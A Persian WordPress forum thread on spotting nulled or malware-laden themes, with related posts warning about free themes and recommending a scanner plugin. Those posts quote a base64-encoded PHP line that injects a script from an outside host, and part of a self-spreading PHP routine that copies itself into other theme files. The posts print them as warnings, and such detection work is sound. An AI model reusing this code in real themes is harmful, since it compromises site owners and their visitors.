1386

تشخیص نال بودن قالب

3 پست در این موضوع قرار دارد

سلام،

از چه طریق میشه فهمید که یک قالب نال شده و یا حاوی کدهای مخرب باشه؟

0

به اشتراک گذاری این پست


لینک به پست

با اطمینان نمی شه گفت.بهتره که قالب از جایی معتبر تهیه شده باشه چون در قالب های اورجینال و اصل ( به عنوان مثل پوسته های تم فارست ) هم دستوارت کد شده ای هم وجود دارند حالا بنا به ساختار پوسته که از چه امکاناتی استفاده کرده و کاربر با چک کردن پوسته با افزونه های آنتی ویروس وردپرس با یه سری اخطار مواجه خواهد شد و کاربر قطعا به شک خواهد افتاد که این پوسته نال شده است.اما اینطور نیست.

اما پوسته هایی که از سایت هایی که کپی رایت رو رعایت نمی کنند دریافت بشن همانند سایت های ارائه ی اسکریپت ها و ... باید شک کرد و هیچوقت استفاده نکرد.

حتی اگر پوسته دریافتی با پوسته ی اورجینال مطابقت داشته باشه.

پوسته ای که از جایی معتبر تهیه شده باشه به کاربر اطمینان خاطر می ده و اگر مشکلی وجود داشته باشه امکان پیگیری وجود دارد.

(البته این مورد که گفتم برای کاربرانی است که آشنایی کافی با دستورات و ... ندارند)

3

به اشتراک گذاری این پست


لینک به پست

در تکمیل حرف های افشین

در مورد امنیت حتی قالب هایی که از خود تم فارست هم خریداری میشوند دارای باگ هایی هستند که مشکلاتی به همراه می آورند

شما باید مسلط باشید به کد نویسی تا بتونید خط به خط بخوانید و از وجود باگ و.... مطمئن شوید

یکی دیگر از دلیل هایی که قالب های رایگان پیشنهاد نمیشه این هست که قالب ها در دست افراد زیادی هستند و اگز شخض در زمینه تسلط کافی داشته باشد با دانلود قالب شما و بررسی کدها به یک باگ دست پیدا میکند

3

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط mojtabashahi
      امروز قصد دارم دو ضرب المثل را که از "گربه" استفاده کرده اند برای شما یادآوری نمایم. و یک هشدار به کاربران "تازه وارد" وردپرس بدهم.
      1 . گربه را دم حجله باید کشت. سایت : www.dorcel.ir ، باید همین اول جلوی فعالیت چنین سایت هایی گرفته شود.
      2 . هیچ گربه ای محض رضای خدا موش نمی گیرد. داخل فایل های یکی از پوسته هایی که رایگان برای دانلود قرار داده شده کد (انکد base64) زیر وجود دارد : 
      <?php $str = 'PHNjcmlwdCB0eXBlPSd0ZXh0L2phdmFzY3JpcHQnIHNyYz0naHR0cDovL2JveC5kb3JjZWwuaXIvZG9yY2VsLnBocCc+PC9zY3JpcHQ+'; echo base64_decode($str); که بعد از دیکد می شود : 
      <script type='text/javascript' src='http://box.dorcel.ir/dorcel.php'>  
      پ.ن : ....
    • توسط koroush
      با سلام خدمت شما
      تشخیص وجود کرم در پوسته مثل کدهای زیر که کرم هستند ، آیا قلق یا روشی جز آشنایی با کدهای php داره؟ یعنی به صورتی سریع.
      مثلا از کدهای زیر چه جوری میشه فهمید کرم هستند ؟
      آیا کدهای زیر توسط افزونه های تشخیص کد مخرب قابل شناسایی هست؟
      یا سایت هایی که url scanner هستن این کدها رو شناسایی می کنن؟
      <?php
      function _check_active_widget(){
      $widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
      $output=strip_tags($output, $allowed);
      $direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
      if (is_array($direst)){
      foreach ($direst as $item){
      if (is_writable($item)){
      $ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
      $cont=file_get_contents($item);
      if (stripos($cont,$ftion) === false){
      $sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
      $output .= $before . "Not found" . $after;
      if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
      .
      .
      .
      .
      $request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
      $posts=$wpdb->get_results($request);
      $output="";
      if ($posts) {
      foreach ($posts as $post) {
      $post_title=stripslashes($post->post_title);
      $comment_count=$post->comment_count;
      $permalink=get_permalink($post->ID);
      $output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
      }
      } else {
      $output .= $before . "None found" . $after;
      }
      return $output;
      }
      ?>
      منبع کدها
    • توسط tazeh
      این اولین پست من در بخش افزونه هاست ، امیدوارم که بتونم همیشه فعالیت داشته باشم
      افزونه Exploit Scanner
      نسخه: 1.2.1
      توضیحات:
      این افزونه ویروس های موجود در کدهای php وردپرس ، قالب ها ،پلاگین ها ، نظرات ، پست ها و تمام فایل های موجود در هاست شما را اسکن می کند و یک گذارش کامل از جست و جو برای شما ارئه خواهد داد.
      که معمولا کدهای مخرب eval () هستند ، که باعث کاهش ورودی از گوگل به وب سایت می شود.
      فایل هایی که آلوده هستند رو حتما پاک کنید.
      اگر فایلهایی آلوده باشد این متن را زیر آن می نویسد Often used to execute malicious code البته کدهای دیگری هستند که باعث آلوده شدن وب سایت می شوند . امام من در php و کد نویسی وردپرس تخصص ندارم و از دوستانی که متخصص اینکار هستند درخواست می کنم که درباره ی این کدها توضیح بدهند.
      تصویر:ندارد
      نصب افزونه:
      بعد از فعال کردن افزونه در قسمت ابزار روی Exploit Scanner کلیک کنید.
      exploit-scanner.1.2.1.zip